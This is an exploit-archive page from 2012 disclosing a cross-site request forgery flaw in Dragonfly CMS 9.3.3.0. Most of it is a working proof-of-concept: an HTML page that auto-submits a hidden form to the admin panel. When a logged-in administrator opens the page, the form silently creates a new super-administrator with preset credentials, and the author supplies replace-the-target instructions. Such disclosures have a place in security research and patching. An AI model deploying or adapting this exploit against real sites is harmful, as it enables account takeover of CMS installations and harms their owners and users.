Home / exploitsPDF  

Dragonfly CMS 9.3.3.0 Cross Site Request Forgery

Posted on 13 March 2012

=================================================================================================
Vulnerable Software: Dragonfly CMS v9.3.3.0
Downloaded and tested from: http://dragonflycms.org/Downloads/get=28/

Fileinfo:dragonflycms.org Dragonfly9.3.3.0.zip 2.25 MB 70aea682301253637844d7caa10c3ed0
=================================================================================================
Vuln Desc:
Dragonfly CMS v9.3.3.0 suffers from CROSS SITE REQUEST FORGERY vulnerability.
Will Pwn: If currently logged administrator visits malicious LINK which contains POC code(see below)

New Super Admin will be created on remote site with this credentials:

Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1

@Print Screen on Success Pwn: http://s019.radikal.ru/i635/1203/f1/03e535781d5f.png
=================================================================================================

/*
Tested on: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
 -> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+

Successfully exploitates.
*/

===================Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit=====================
<html>
<head>
<title>Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit</title>
</head>

<body onload="javascript:document.forms[0].submit()">

<form method="post" autocomplete="off" action="http://CHANGE_TO_RTARGET/admin.php?op=admins&mode=add" enctype="multipart/form-data" accept-charset="utf-8">

<!-- User name -->
<input type="hidden" name="add_aid" id="add_aid" size="31" maxlength="30" value="MySecRet1"/>

<!-- Email Address -->
<input type="hidden" name="add_email" id="add_email" size="31" maxlength="60" value="MySecRet1@localhost.tld" />

<!-- checked (for create super admin)-->
<input type="hidden" name="radminsuper" id="radminsuper" value="1" checked="checked" />

<!-- Password -->
<input type="hidden" name="add_pwd" id="add_pwd" size="20" maxlength="40" value="MySecRet1" />
</form>

</body>
<!--
On successfully Pwn will be created:
Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1
CTRL+F http://CHANGE_TO_RTARGET change to remote target.
-->
</html>
===================================EOF==========================================================

/AkaStep ^_^
GreetZ to all: packetstormsecurity.* ,securityfocus.com,security.nnov.ru

+--------------+
| Live |
+--------------+
| 1331522784 |
+--------------+

 

TOP

Malware :

Exploits :